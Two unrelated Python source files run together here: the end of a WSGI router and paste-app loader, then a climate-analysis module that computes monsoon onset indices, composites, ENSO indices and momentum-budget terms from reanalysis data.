# Pointing to an arbitrary WSGI app. You can specify the
# {path_info:.*} parameter so the target app can be handed just that
# section of the URL.
mapper.connect(None, '/v1.0/{path_info:.*}', controller=BlogApp())
"""
self.map = mapper
self._router = routes.middleware.RoutesMiddleware(self._dispatch,
self.map)
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, req):
"""Route the incoming request to a controller based on self.map.
If no match, return a 404.
"""
return self._router
@staticmethod
@webob.dec.wsgify(RequestClass=Request)
def _dispatch(req):
"""Dispatch the request to the appropriate controller.
Called by self._router after matching the incoming request to a route
and putting the information into req.environ. Either returns 404
or the routed WSGI app's response.
"""
match = req.environ['wsgiorg.routing_args'][1]
if not match:
return webob.exc.HTTPNotFound()
app = match['controller']
return app
class ConfigNotFound(Exception):
def __init__(self, path):
msg = _('Could not find config at %(path)s') % {'path': path}
super(ConfigNotFound, self).__init__(msg)
class PasteAppNotFound(Exception):
def __init__(self, name, path):
msg = (_("Could not load paste app '%(name)s' from %(path)s") %
{'name': name, 'path': path})
super(PasteAppNotFound, self).__init__(msg)
class Loader(object):
"""Used to load WSGI applications from paste configurations."""
def __init__(self, conf):
"""Initialize the loader, and attempt to find the config.
        :param conf: Instance of ConfigOpts.
:returns: None
"""
conf.register_opts(_options.wsgi_opts)
self.config_path = None
config_path = conf.api_paste_config
if not os.path.isabs(config_path):
self.config_path = conf.find_file(config_path)
elif os.path.exists(config_path):
self.config_path = config_path
if not self.config_path:
raise ConfigNotFound(path=config_path)
def load_app(self, name):
"""Return the paste URLMap wrapped WSGI application.
:param name: Name of the application to load.
:returns: Paste URLMap object wrapping the requested application.
:raises: `PasteAppNotFound`
"""
try:
LOG.debug("Loading app %(name)s from %(path)s",
{'name': name, 'path': self.config_path})
return deploy.loadapp("config:%s" % self.config_path, name=name)
except LookupError:
LOG.exception(_LE("Couldn't lookup app: %s"), name)
raise PasteAppNotFound(name=name, path=self.config_path)
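# Illustrative wiring of Loader and Server (app name, host, and port are
# placeholders; conf is an oslo_config ConfigOpts with api_paste_config set):
#   loader = Loader(conf)
#   app = loader.load_app("myapi")
#   server = Server(conf, "myapi", app, host="127.0.0.1", port=8080)
#   server.start()
#   server.wait()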
|
|
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import numpy as np
import pandas as pd
import xarray as xray
import matplotlib.pyplot as plt
import collections
import os
import json
import atmos as atm
import merra
import indices
# ----------------------------------------------------------------------
def wrapyear(data, data_prev, data_next, daymin, daymax, year=None):
"""Wrap daily data from previous and next years for extended day ranges.
"""
daynm = atm.get_coord(data, 'day', 'name')
def leap_adjust(data, year):
data = atm.squeeze(data)
ndays = 365
if year is not None and atm.isleap(year):
ndays += 1
else:
# Remove NaN for day 366 in non-leap year
            data = atm.subset(data, {daynm : (1, ndays)})
return data, ndays
data, ndays = leap_adjust(data, year)
if data_prev is not None:
data_prev, ndays_prev = leap_adjust(data_prev, year - 1)
data_prev[daynm] = data_prev[daynm] - ndays_prev
data_out = xray.concat([data_prev, data], dim=daynm)
else:
data_out = data
if data_next is not None:
data_next, _ = leap_adjust(data_next, year + 1)
data_next[daynm] = data_next[daynm] + ndays
data_out = xray.concat([data_out, data_next], dim=daynm)
data_out = atm.subset(data_out, {daynm : (daymin, daymax)})
return data_out
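# Illustrative call (the DataArrays are hypothetical, each with a 'day' coord):
#   extended = wrapyear(data_2001, data_2000, data_2002, daymin=-60,
#                       daymax=400, year=2001)
# Previous-year days are shifted negative and next-year days past 365/366,
# giving one continuous day axis running from -60 through 400.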
# ----------------------------------------------------------------------
def wrapyear_all(data, daymin, daymax):
"""Wrap daily data to extended ranges over each year in yearly data."""
def extract_year(data, year, years):
if year in years:
data_out = atm.subset(data, {'year' : (year, year)})
else:
data_out = None
return data_out
daynm = atm.get_coord(data, 'day', 'name')
days = np.arange(daymin, daymax + 1)
days = xray.DataArray(days, name=daynm, coords={daynm : days})
years = atm.get_coord(data, 'year')
yearnm = atm.get_coord(data, 'year', 'name')
for y, year in enumerate(years):
year_prev, year_next = year - 1, year + 1
var = extract_year(data, year, years)
var_prev = extract_year(data, year_prev, years)
var_next = extract_year(data, year_next, years)
var_out = wrapyear(var, var_prev, var_next, daymin, daymax, year)
var_out = atm.expand_dims(var_out, 'year', year, axis=0)
var_out = var_out.reindex_like(days)
if y == 0:
data_out = var_out
else:
data_out = xray.concat([data_out, var_out], dim=yearnm)
return data_out
# ----------------------------------------------------------------------
def daily_rel2onset(data, d_onset, npre, npost):
"""Return subset of daily data aligned relative to onset day.
Parameters
----------
data : xray.DataArray
Daily data.
d_onset : ndarray
Array of onset date (day of year) for each year.
npre, npost : int
Number of days before and after onset to extract.
Returns
-------
data_out : xray.DataArray
Subset of N days of daily data for each year, where
N = npre + npost + 1 and the day dimension is
dayrel = day - d_onset.
"""
name, attrs, coords, dimnames = atm.meta(data)
yearnm = atm.get_coord(data, 'year', 'name')
daynm = atm.get_coord(data, 'day', 'name')
years = atm.makelist(atm.get_coord(data, 'year'))
if isinstance(d_onset, xray.DataArray):
d_onset = d_onset.values
else:
d_onset = atm.makelist(d_onset)
relnm = daynm + 'rel'
for y, year in enumerate(years):
dmin, dmax = d_onset[y] - npre, d_onset[y] + npost
subset_dict = {yearnm : (year, None), daynm : (dmin, dmax)}
sub = atm.subset(data, subset_dict)
sub = sub.rename({daynm : relnm})
sub[relnm] = sub[relnm] - d_onset[y]
sub[relnm].attrs['long_name'] = 'Day of year relative to onset day'
if y == 0:
data_out = sub
else:
data_out = xray.concat([data_out, sub], dim=yearnm)
data_out.attrs['d_onset'] = d_onset
return data_out
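# Sketch (onset days are hypothetical): npre=30, npost=60 yields 91 days per
# year on a relative-day axis running from -30 to +60 around each onset:
#   precip_rel = daily_rel2onset(precip, d_onset=[152, 148], npre=30, npost=60)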
# ----------------------------------------------------------------------
def comp_days_centered(ndays, offset=0):
"""Return days for pre/onset/post composites centered on onset.
Parameters
----------
ndays : int
Number of days to average in each composite.
offset : int, optional
Number of offset days between pre/onset and onset/post
day ranges.
Returns
-------
reldays : dict of arrays
Components are 'pre', 'onset', and 'post', arrays of days
of the year relative to onset day, for each composite.
"""
ndays = int(ndays)
n1 = int(ndays // 2)
n2 = ndays - n1
reldays = collections.OrderedDict()
reldays['pre'] = np.arange(-offset - n1 - ndays, -offset - n1)
reldays['onset'] = np.arange(-n1, n2)
reldays['post'] = np.arange(offset + n2, offset + n2 + ndays)
return reldays
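# Worked example: comp_days_centered(5) gives pre=[-7..-3], onset=[-2..2],
# post=[3..7]; with offset=3 the pre/post windows shift outward by 3 days
# (pre=[-10..-6], post=[6..10]).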
# ----------------------------------------------------------------------
def composite(data, compdays, return_avg=True, daynm='Dayrel'):
"""Return composite data fields for selected days.
Parameters
----------
data : xray.DataArray
Daily data to composite.
compdays: dict of arrays or lists
Lists of days to include in each composite.
return_avg : bool, optional
If True, return the mean of the selected days, otherwise
return the extracted individual days for each composite.
    daynm : str, optional
Name of day dimension in data.
Returns
-------
comp : dict of xray.DataArrays
Composite data fields for each key in compdays.keys().
"""
comp = collections.OrderedDict()
_, attrs, _, _ = atm.meta(data)
for key in compdays:
comp[key] = atm.subset(data, {daynm : (compdays[key], None)})
if return_avg:
comp[key] = comp[key].mean(dim=daynm)
comp[key].attrs = attrs
comp[key].attrs[daynm] = compdays[key]
return comp
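# Sketch combining the two helpers above (data is a hypothetical DataArray
# with a 'Dayrel' dimension):
#   comp = composite(data, comp_days_centered(5), daynm='Dayrel')
# comp['pre'], comp['onset'], and comp['post'] are then 5-day means over each
# composite window.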
# ----------------------------------------------------------------------
def get_mfc_box(mfcfiles, precipfiles, evapfiles, years, nroll, lat1, lat2,
lon1, lon2):
"""Return daily tseries MFC, precip and evap averaged over lat-lon box.
"""
subset_dict = {'lat' : (lat1, lat2), 'lon' : (lon1, lon2)}
databox = {}
if mfcfiles is not None:
mfc = atm.combine_daily_years('MFC', mfcfiles, years, yearname='year',
subset_dict=subset_dict)
databox['MFC'] = mfc
if precipfiles is not None:
pcp = atm.combine_daily_years('PRECTOT', precipfiles, years, yearname='year',
subset_dict=subset_dict)
databox['PCP'] = pcp
if evapfiles is not None:
evap = atm.combine_daily_years('EVAP', evapfiles, years, yearname='year',
subset_dict=subset_dict)
databox['EVAP'] = evap
    # Snapshot the keys: the loop below adds new entries to databox
    nms = list(databox.keys())
for nm in nms:
var = databox[nm]
var = atm.precip_convert(var, var.attrs['units'], 'mm/day')
var = atm.mean_over_geobox(var, lat1, lat2, lon1, lon2)
databox[nm + '_UNSM'] = var
databox[nm + '_ACC'] = np.cumsum(var, axis=1)
if nroll is None:
databox[nm] = var
else:
databox[nm] = atm.rolling_mean(var, nroll, axis=-1, center=True)
tseries = xray.Dataset(databox)
return tseries
# ----------------------------------------------------------------------
def get_onset_indices(onset_nm, datafiles, years, data=None):
"""Return monsoon onset/retreat/length indices.
"""
# Options for CHP_MFC and CHP_PCP
lat1, lat2 = 10, 30
lon1, lon2 = 60, 100
chp_opts = [None, lat1, lat2, lon1, lon2]
if onset_nm == 'HOWI':
maxbreak = 10
npts = 100
ds = atm.combine_daily_years(['uq_int', 'vq_int'], datafiles, years,
yearname='year')
index, _ = indices.onset_HOWI(ds['uq_int'], ds['vq_int'], npts,
maxbreak=maxbreak)
index.attrs['title'] = 'HOWI (N=%d)' % npts
    elif onset_nm == 'CHP_MFC':
        # Compute the index before attaching the daily tseries; the original
        # order assigned index['ts_daily'] before index existed.
        tseries = None
        if data is None:
            tseries = get_mfc_box(datafiles, None, None, years, *chp_opts)
            data = tseries['MFC_ACC']
        index = indices.onset_changepoint(data)
        if tseries is not None:
            index['ts_daily'] = tseries['MFC']
    elif onset_nm == 'CHP_PCP':
        tseries = None
        if data is None:
            tseries = get_mfc_box(None, datafiles, None, years, *chp_opts)
            data = tseries['PCP_ACC']
        index = indices.onset_changepoint(data)
        if tseries is not None:
            index['ts_daily'] = tseries['PCP']
# Monsoon retreat and length indices
if 'retreat' in index:
index['length'] = index['retreat'] - index['onset']
else:
index['retreat'] = np.nan * index['onset']
index['length'] = np.nan * index['onset']
return index
# ----------------------------------------------------------------------
def get_enso_indices(years,
inds=['ONI_MAM', 'ONI_JJA', 'MEI_MARAPR', 'MEI_JULAUG'],
ensofiles=None):
"""Return ENSO indices.
"""
if ensofiles is None:
ensodir = atm.homedir() + 'dynamics/calc/ENSO/'
ensofiles = {'MEI' : ensodir + 'enso_mei.csv',
'ONI' : ensodir + 'enso_oni.csv'}
enso_in = {}
for key in ensofiles:
enso_in[key] = pd.read_csv(ensofiles[key], index_col=0)
enso = pd.DataFrame()
for key in enso_in:
for ssn in enso_in[key]:
enso[key + '_' + ssn] = enso_in[key][ssn]
enso = enso.loc[enso.index.isin(years)]
enso = enso[inds]
return enso
# ----------------------------------------------------------------------
def get_strength_indices(years, data_in, onset, retreat, yearnm='year',
daynm='day'):
"""Return various indices of the monsoon strength.
Input variables in data_in dataset are the unsmoothed daily values
averaged over the monsoon area.
"""
ssn = xray.Dataset()
coords = {yearnm : years}
ssn['onset'] = xray.DataArray(onset, coords=coords)
ssn['retreat'] = xray.DataArray(retreat, coords=coords)
ssn['length'] = ssn['retreat'] - ssn['onset']
for key in data_in.data_vars:
for key2 in ['_JJAS_AVG', '_JJAS_TOT', '_LRS_AVG', '_LRS_TOT']:
ssn[key + key2] = xray.DataArray(np.nan * np.ones(len(years)),
coords=coords)
for key in data_in.data_vars:
for y, year in enumerate(years):
d1 = int(onset.values[y])
d2 = int(retreat.values[y] - 1)
days_jjas = atm.season_days('JJAS', atm.isleap(year))
data = atm.subset(data_in[key], {yearnm : (year, None)})
data_jjas = atm.subset(data, {daynm : (days_jjas, None)})
data_lrs = atm.subset(data, {daynm : (d1, d2)})
ssn[key + '_JJAS_AVG'][y] = data_jjas.mean(dim=daynm).values
ssn[key + '_LRS_AVG'][y] = data_lrs.mean(dim=daynm).values
ssn[key + '_JJAS_TOT'][y] = ssn[key + '_JJAS_AVG'][y] * len(days_jjas)
ssn[key + '_LRS_TOT'][y] = ssn[key + '_LRS_AVG'][y] * ssn['length'][y]
ssn = ssn.to_dataframe()
return ssn
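# Sketch (inputs are hypothetical): given unsmoothed box-averaged daily data,
#   ssn = get_strength_indices(years, data_in, index['onset'], index['retreat'])
# returns a DataFrame with <var>_JJAS_AVG/_JJAS_TOT/_LRS_AVG/_LRS_TOT columns.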
# ----------------------------------------------------------------------
def var_type(varnm):
keys = ['THETA', 'MSE', 'DSE', 'V*', 'abs_vort', 'EMFD', 'VFLXMSE']
test = [varnm.startswith(key) for key in keys]
if np.array(test).any():
vtype = 'calc'
else:
vtype = 'basic'
return vtype
# ----------------------------------------------------------------------
def get_daily_data(varid, plev, years, datafiles, data, daymin=1,
daymax=366, yearnm='year'):
"""Return daily data (basic variable or calculated variable).
Data is read from datafiles if varnm is a basic variable.
If varnm is a calculated variable (e.g. potential temperature),
the base variables for calculation are provided in the dict data.
"""
years = atm.makelist(years)
datafiles = atm.makelist(datafiles)
if isinstance(plev, int) or isinstance(plev, float):
pres = atm.pres_convert(plev, 'hPa', 'Pa')
elif plev == 'LML' and 'PS' in data:
pres = data['PS']
else:
pres = None
def get_var(data, varnm, plev=None):
if plev is None:
plev = ''
elif plev == 'LML' and varnm == 'QV':
varnm = 'Q'
return data[varnm + str(plev)]
if var_type(varid) == 'calc':
print('Computing ' + varid)
if varid == 'THETA':
var = atm.potential_temp(get_var(data, 'T', plev), pres)
elif varid == 'THETA_E':
var = atm.equiv_potential_temp(get_var(data, 'T', plev), pres,
get_var(data, 'QV', plev))
elif varid == 'DSE':
var = atm.dry_static_energy(get_var(data, 'T', plev),
get_var(data, 'H', plev))
elif varid == 'MSE':
var = atm.moist_static_energy(get_var(data, 'T', plev),
get_var(data, 'H', plev),
get_var(data, 'QV', plev))
elif varid == 'VFLXMSE':
Lv = atm.constants.Lv.values
var = data['VFLXCPT'] + data['VFLXPHI'] + data['VFLXQV'] * Lv
var.attrs['units'] = data['VFLXCPT'].attrs['units']
var.attrs['long_name'] = 'Vertically integrated MSE meridional flux'
else:
with xray.open_dataset(datafiles[0]) as ds:
if varid not in ds.data_vars:
varid = varid + str(plev)
var = atm.combine_daily_years(varid, datafiles, years, yearname=yearnm,
subset_dict={'day' : (daymin, daymax)})
var = atm.squeeze(var)
# Make sure year dimension is included for single year
if len(years) == 1 and 'year' not in var.dims:
var = atm.expand_dims(var, yearnm, years[0], axis=0)
# Wrap years for extended day ranges
if daymin < 1 or daymax > 366:
var = wrapyear_all(var, daymin, daymax)
# Convert precip and evap to mm/day
if varid in ['precip', 'PRECTOT', 'EVAP']:
var = atm.precip_convert(var, var.attrs['units'], 'mm/day')
return var
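# Sketch (file list and years are placeholders; data is unused for basic
# variables):
#   T = get_daily_data('T', 200, [2000, 2001], datafiles, data={},
#                      daymin=1, daymax=365)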
# ----------------------------------------------------------------------
def get_data_rel(varid, plev, years, datafiles, data, onset, npre, npost):
"""Return daily data aligned relative to onset/withdrawal day.
"""
years = atm.makelist(years)
onset = atm.makelist(onset)
datafiles = atm.makelist(datafiles)
daymin = min(onset) - npre
daymax = max(onset) + npost
# For a single year, add extra year before/after, if necessary
wrap_single = False
years_in = years
if len(years) == 1 and var_type(varid) == 'basic':
filenm = datafiles[0]
year = years[0]
if daymin < 1:
wrap_single = True
file_pre = filenm.replace(str(year), str(year - 1))
if os.path.isfile(file_pre):
years_in = [year - 1] + years_in
datafiles = [file_pre] + datafiles
if daymax > len(atm.season_days('ANN', year)):
wrap_single = True
file_post = filenm.replace(str(year), str(year + 1))
if os.path.isfile(file_post):
years_in = years_in + [year + 1]
datafiles = datafiles + [file_post]
var = get_daily_data(varid, plev, years_in, datafiles, data, daymin=daymin,
daymax=daymax)
# Get rid of extra years
if wrap_single:
var = atm.subset(var, {'year' : (years[0], years[0])})
# Make sure year dimension is included for single year
if len(years) == 1 and 'year' not in var.dims:
var = atm.expand_dims(var, 'year', years[0], axis=0)
# Align relative to onset day
# (not needed for calc variables since they're already aligned)
if var_type(varid) == 'basic':
print('Aligning data relative to onset day')
var = daily_rel2onset(var, onset, npre, npost)
return var
# ----------------------------------------------------------------------
def load_dailyrel(datafiles, yearnm='year', onset_varnm='D_ONSET',
retreat_varnm='D_RETREAT'):
ds = atm.load_concat(datafiles, concat_dim=yearnm)
if isinstance(ds, xray.DataArray):
ds = ds.to_dataset()
    varnms = list(ds.data_vars.keys())
if onset_varnm is not None:
onset = ds[onset_varnm]
varnms.remove(onset_varnm)
else:
onset = np.nan * ds[yearnm]
if retreat_varnm is not None:
retreat = ds[retreat_varnm]
varnms.remove(retreat_varnm)
else:
retreat = np.nan * ds[yearnm]
# Remaining data variable is the data field
varnm = varnms[0]
data = ds[varnm]
# Copy attributes from the first file in the list
with xray.open_dataset(datafiles[0]) as ds0:
data.attrs = ds0[varnm].attrs
return data, onset, retreat
# ----------------------------------------------------------------------
def plot_colorbar(symmetric, orientation='vertical', ax=None, **kwargs):
if ax is None:
ax = plt.gca()
if symmetric:
atm.colorbar_symm(orientation=orientation, ax=ax, **kwargs)
else:
plt.colorbar(orientation=orientation, ax=ax, **kwargs)
# ----------------------------------------------------------------------
def contourf_lat_time(lat, days, plotdata, clev=None, title='', cmap='RdBu_r',
onset_nm='', zero_line=False, ax=None):
if ax is None:
ax = plt.gca()
vals = plotdata.values.T
vals = np.ma.array(vals, mask=np.isnan(vals))
ncont = 40
symmetric = atm.symm_colors(plotdata)
    if clev is None:
cint = atm.cinterval(vals, n_pref=ncont, symmetric=symmetric)
clev = atm.clevels(vals, cint, symmetric=symmetric)
cf = ax.contourf(days, lat, vals, clev, cmap=cmap)
plt.colorbar(mappable=cf, ax=ax)
#plot_colorbar(symmetric, ax=ax, mappable=cf)
if symmetric and zero_line:
ax.contour(days, lat, vals, [0], colors='k')
ax.grid(True)
ax.set_ylabel('Latitude')
ax.set_xlabel('Day Relative to %s Onset' % onset_nm)
ax.set_title(title)
xmin, xmax = ax.get_xlim()
if xmax > 60:
ax.set_xticks(range(int(xmin), int(xmax) + 1, 30))
plt.draw()
# ----------------------------------------------------------------------
def plotyy(data1, data2=None, xname='dayrel', data1_styles=None,
y2_opts={'color' : 'r', 'alpha' : 0.6, 'linewidth' : 2},
xlims=None, xticks=None, ylims=None, yticks=None, y2_lims=None,
xlabel='', y1_label='', y2_label='', legend=False,
legend_kw={'fontsize' : 9, 'handlelength' : 2.5},
x0_axvlines=None, grid=True):
"""Plot data1 and data2 together on different y-axes."""
data1, data2 = atm.to_dataset(data1), atm.to_dataset(data2)
for nm in data1.data_vars:
if data1_styles is None:
plt.plot(data1[xname], data1[nm], label=nm)
elif isinstance(data1_styles[nm], dict):
plt.plot(data1[xname], data1[nm], label=nm, **data1_styles[nm])
else:
plt.plot(data1[xname], data1[nm], data1_styles[nm], label=nm)
atm.ax_lims_ticks(xlims, xticks, ylims, yticks)
plt.grid(grid)
if x0_axvlines is not None:
for x0 in x0_axvlines:
plt.axvline(x0, color='k')
plt.xlabel(xlabel)
plt.ylabel(y1_label)
axes = [plt.gca()]
if data2 is not None:
plt.sca(plt.gca().twinx())
for nm in data2.data_vars:
plt.plot(data2[xname], data2[nm], label=nm, **y2_opts)
if y2_lims is not None:
plt.ylim(y2_lims)
        # fmt_axlabels doesn't accept 'linewidth'; filter it out on a copy so
        # the (mutable) default y2_opts argument isn't modified across calls.
        label_opts = {k: v for k, v in y2_opts.items() if k != 'linewidth'}
        atm.fmt_axlabels('y', y2_label, **label_opts)
atm.ax_lims_ticks(xlims, xticks)
axes = axes + [plt.gca()]
if legend:
if data2 is None:
plt.legend(**legend_kw)
else:
atm.legend_2ax(axes[0], axes[1], **legend_kw)
return axes
# ----------------------------------------------------------------------
def eddy_decomp(var, nt, lon1, lon2, taxis=0):
"""Decompose variable into mean and eddy fields."""
lonname = atm.get_coord(var, 'lon', 'name')
tstr = 'Time mean (%d-%s rolling)' % (nt, var.dims[taxis])
lonstr = atm.latlon_labels([lon1, lon2], 'lon', deg_symbol=False)
lonstr = 'zonal mean (' + '-'.join(lonstr) + ')'
name, attrs, coords, dims = atm.meta(var)
varbar = atm.rolling_mean(var, nt, axis=taxis, center=True)
varbarzon = atm.subset(varbar, {lonname : (lon1, lon2)})
varbarzon = varbarzon.mean(dim=lonname)
varbarzon.attrs = attrs
comp = xray.Dataset()
comp[name + '_AVG'] = varbarzon
comp[name + '_AVG'].attrs['component'] = tstr + ', ' + lonstr
comp[name + '_ST'] = varbar - varbarzon
comp[name + '_ST'].attrs = attrs
comp[name + '_ST'].attrs['component'] = 'Stationary eddy'
comp[name + '_TR'] = var - varbar
comp[name + '_TR'].attrs = attrs
comp[name + '_TR'].attrs['component'] = 'Transient eddy'
return comp
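# By construction the components sum back to the input: AVG + ST = varbar
# (the rolling mean) and TR = var - varbar, so AVG + ST + TR == var wherever
# the rolling mean is defined. Usage sketch (assumes the input is named 'U'):
#   comp = eddy_decomp(u, nt=5, lon1=40, lon2=120)
#   recon = comp['U_AVG'] + comp['U_ST'] + comp['U_TR']   # ~= u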
# ----------------------------------------------------------------------
def latlon_data(var, latmax=89):
"""Return lat, lon coords in radians and cos(lat)."""
data = xray.Dataset()
# Latitude
latname = atm.get_coord(var, 'lat', 'name')
latdim = atm.get_coord(var, 'lat', 'dim')
lat = atm.get_coord(var, 'lat')
latcoords = {latname: lat.copy()}
lat[abs(lat) > latmax] = np.nan
data['LAT'] = xray.DataArray(lat, coords=latcoords)
latrad = np.radians(lat)
data['LATRAD'] = xray.DataArray(latrad, coords=latcoords)
data['COSLAT'] = np.cos(data['LATRAD'])
data.attrs['latname'] = latname
data.attrs['latdim'] = latdim
# Longitude
try:
lonname = atm.get_coord(var, 'lon', 'name')
londim = atm.get_coord(var, 'lon', 'dim')
lon = atm.get_coord(var, 'lon')
loncoords = {lonname : lon.copy()}
data['LON'] = xray.DataArray(lon, coords=loncoords)
lonrad = np.radians(lon)
data['LONRAD'] = xray.DataArray(lonrad, coords=loncoords)
data.attrs['lonname'] = lonname
data.attrs['londim'] = londim
except ValueError:
data.attrs['lonname'] = None
data.attrs['londim'] = None
return data
# ----------------------------------------------------------------------
def advection(uflow, vflow, omegaflow, u, dudp):
"""Return x, y and p components of advective terms in momentum budget.
"""
a = atm.constants.radius_earth
latlon = latlon_data(u)
latdim, londim = latlon.attrs['latdim'], latlon.attrs['londim']
latrad, coslat = latlon['LATRAD'], latlon['COSLAT']
if londim is not None:
lonrad = latlon['LONRAD']
ds = xray.Dataset()
if londim is not None:
ds['X'] = atm.gradient(u, lonrad, londim) * uflow / (a*coslat)
else:
ds['X'] = 0.0 * u
ds['Y'] = atm.gradient(u*coslat, latrad, latdim) * vflow / (a*coslat)
ds['P'] = omegaflow * dudp
return ds
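# The components above are the spherical-coordinate advection terms for
# zonal momentum:
#   X = uflow * du/dlon / (a*cos(lat))
#   Y = vflow * d(u*cos(lat))/dlat / (a*cos(lat))
#   P = omegaflow * du/dp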
# ----------------------------------------------------------------------
def fluxdiv(u, v, omega, dudp, domegadp):
"""Return x, y and p components of EMFD terms in momentum budget.
"""
a = atm.constants.radius_earth
latlon = latlon_data(u)
latdim, londim = latlon.attrs['latdim'], latlon.attrs['londim']
    latrad, coslat = latlon['LATRAD'], latlon['COSLAT']
coslat_sq = coslat ** 2
if londim is not None:
lonrad = latlon['LONRAD']
ds = xray.Dataset()
if londim is not None:
ds['X'] = atm.gradient(u * u, lonrad, londim) / (a*coslat)
else:
ds['X'] = 0.0 * u
ds['Y'] = atm.gradient(u * v * coslat_sq, latrad, latdim) / (a*coslat_sq)
ds['P'] = omega * dudp + u * domegadp
return ds
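# The components above are the eddy momentum flux divergence terms in
# flux form:
#   X = d(u*u)/dlon / (a*cos(lat))
#   Y = d(u*v*cos^2(lat))/dlat / (a*cos^2(lat))
#   P = d(u*omega)/dp, expanded by the product rule as
#       omega*du/dp + u*domega/dp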
# ----------------------------------------------------------------------
def calc_ubudget(datafiles, ndays, lon1, lon2, plev=200):
"""Calculate momentum budget for daily data in one year.
Keys of datafiles dict must be: U, V, DUDP, H, OMEGA, DOMEGADP, DUDTANA
"""
# Read data
data = xray.Dataset()
for nm in datafiles:
print('Reading ' + datafiles[nm])
with xray.open_dataset(datafiles[nm]) as ds:
if nm in ds.data_vars:
var = ds[nm]
else:
var = ds[nm + '%d' % plev]
if 'Day' in var.dims:
var = var.rename({'Day' : 'day'})
data[nm] = atm.squeeze(var)
data[nm].load()
data['PHI'] = atm.constants.g.values * data['H']
# Put zeros in for any missing variables (e.g. du/dp)
for nm in ['OMEGA', 'DUDP', 'DOMEGADP', 'DUDTANA']:
if nm not in data.data_vars:
data[nm] = 0.0 * data['U']
# Eddy decomposition
taxis = 0
for nm in data.data_vars:
print('Eddy decomposition for ' + nm)
comp = eddy_decomp(data[nm], ndays, lon1, lon2, taxis)
for compnm in comp:
data[compnm] = comp[compnm]
# Momentum budget calcs
# du/dt = sum of terms in ubudget
ubudget = xray.Dataset()
readme = 'Momentum budget: ACCEL = sum of all other data variables'
ubudget.attrs['readme'] = readme
ubudget.attrs['ndays'] = ndays
ubudget.attrs['lon1'] = lon1
ubudget.attrs['lon2'] = lon2
# Advective terms
keypairs = [ ('AVG', 'AVG'), ('AVG', 'ST'), ('ST', 'AVG')]
print('Computing advective terms')
for pair in keypairs:
print(pair)
ukey, flowkey = pair
u = data['U_' + ukey]
dudp = data['DUDP_' + ukey]
uflow = data['U_' + flowkey]
vflow = data['V_' + flowkey]
omegaflow = data['OMEGA_' + flowkey]
adv = advection(uflow, vflow, omegaflow, u, dudp)
for nm in adv.data_vars:
key = 'ADV_%s_%s_%s' % (ukey, flowkey, nm)
ubudget[key] = - adv[nm]
long_name = 'Advection of %s momentum by %s' % (ukey, flowkey)
ubudget[key].attrs['long_name'] = long_name
# EMFD terms
keys = ['TR', 'ST']
print('Computing EMFD terms')
for key in keys:
print(key)
u = data['U_' + key]
v = data['V_' + key]
omega = data['OMEGA_' + key]
dudp = data['DUDP_' + key]
domegadp = data['DOMEGADP_' + key]
emfd = fluxdiv(u, v, omega, dudp, domegadp)
for nm in emfd.data_vars:
ubudget['EMFC_%s_%s' % (key, nm)] = - emfd[nm]
# Coriolis terms
latlon = latlon_data(data['V_ST'])
lat = latlon['LAT']
f = atm.coriolis(lat)
ubudget['COR_AVG'] = data['V_AVG'] * f
ubudget['COR_ST'] = data['V_ST'] * f
# Pressure gradient terms
a = atm.constants.radius_earth.values
coslat = latlon['COSLAT']
lonrad = latlon['LONRAD']
londim = atm.get_coord(data['PHI_ST'], 'lon', 'dim')
ubudget['PGF_ST'] = - atm.gradient(data['PHI_ST'], lonrad, londim) / (a*coslat)
# Analysis increment for dU/dt
ubudget['ANA'] = data['DUDTANA']
# Time mean
print('Computing rolling time mean')
for nm in ubudget.data_vars:
ubudget[nm] = atm.rolling_mean(ubudget[nm], ndays, axis=taxis, center=True)
# Acceleration
nseconds = 60 * 60 * 24 * ndays
delta_u = np.nan * data['U']
u = data['U'].values
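    # Centered difference across the ndays window with k = ndays // 2:
    # ACCEL[i] = (u[i + ndays - k] - u[i - k]) / (ndays * 86400 s), i.e. a
    # centered difference (offset by half a day when ndays is odd); the
    # half-window at each end is left as NaN.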
delta_u.values[ndays//2:-ndays//2] = (u[ndays:] - u[:-ndays]) / nseconds
ubudget['ACCEL'] = delta_u
return ubudget, data
# ----------------------------------------------------------------------
def v_components(ubudget, scale=None, eqbuf=5.0):
"""Return mean, eddy-driven, etc components of v for streamfunction.
"""
comp_dict = {'MMC' : 'ADV_AVG', 'PGF' : 'PGF_ST', 'EDDY_ST' : 'EMFC_ST',
'EDDY_TR' : 'EMFC_TR', 'EDDY_CRS' : 'ADV_CRS'}
if scale is not None:
ubudget = ubudget * scale
latname = atm.get_coord(ubudget, 'lat', 'name')
lat = ubudget[latname]
f = atm.coriolis(lat)
f[abs(lat) < eqbuf] = np.nan
v = xray.Dataset()
v['TOT'] = ubudget['COR'] / f
for nm in sorted(comp_dict):
v[nm] = - ubudget[comp_dict[nm]] / f
v['EDDY'] = v['EDDY_CRS'] + v['EDDY_TR'] + v['EDDY_ST']
v['RESID'] = v['TOT'] - v['MMC'] - v['PGF'] - v['EDDY']
return v
# ----------------------------------------------------------------------
def kerala_boundaries(filenm='data/india_state.geojson'):
"""Return x, y vectors of coordinates for Kerala region boundaries."""
with open(filenm) as f:
data = json.load(f)
i_region, i_poly = 17, 44
poly = data['features'][i_region]['geometry']['coordinates'][i_poly][0]
arr = np.array(poly)
x, y = arr[:, 0], arr[:, 1]
# Cut out wonky bits
i1, i2 = 8305, 19200
x = np.concatenate((x[:i1], x[i2:]))
y = np.concatenate((y[:i1], y[i2:]))
return x, y
# ----------------------------------------------------------------------
def find_zeros_1d(x, y, xmin=None, xmax=None, interp=0.1, return_type='all'):
"""Find x-coordinate of zero(s) of y between xmin and xmax.
Parameter return_type determines what to return if more than one
zero crossing: 'all', 'min', or 'max'.
"""
if xmin is None:
xmin = np.nanmin(x)
if xmax is None:
xmax = np.nanmax(x)
xi = np.arange(xmin, xmax + interp/2.0, interp)
yi = np.interp(xi, x, y)
# Find zero crossings
ind = ((yi[1:] * yi[:-1]) < 0)
ind = np.concatenate((ind, [False]))
if ind.sum() == 0:
return np.nan
xzero = xi[ind]
if return_type.lower() == 'min':
xzero = np.min(xzero)
if return_type.lower() == 'max':
xzero = np.max(xzero)
return xzero
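# Example sketch (made-up profile): locate the sign change of a meridional
# profile between 20S and 20N:
#   lat = np.arange(-30.0, 30.5, 0.5)
#   v = np.sin(np.radians(6.0 * lat))               # zeros every 30 degrees
#   lat0 = find_zeros_1d(lat, v, xmin=-20, xmax=20)  # ~0.0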
# ----------------------------------------------------------------------
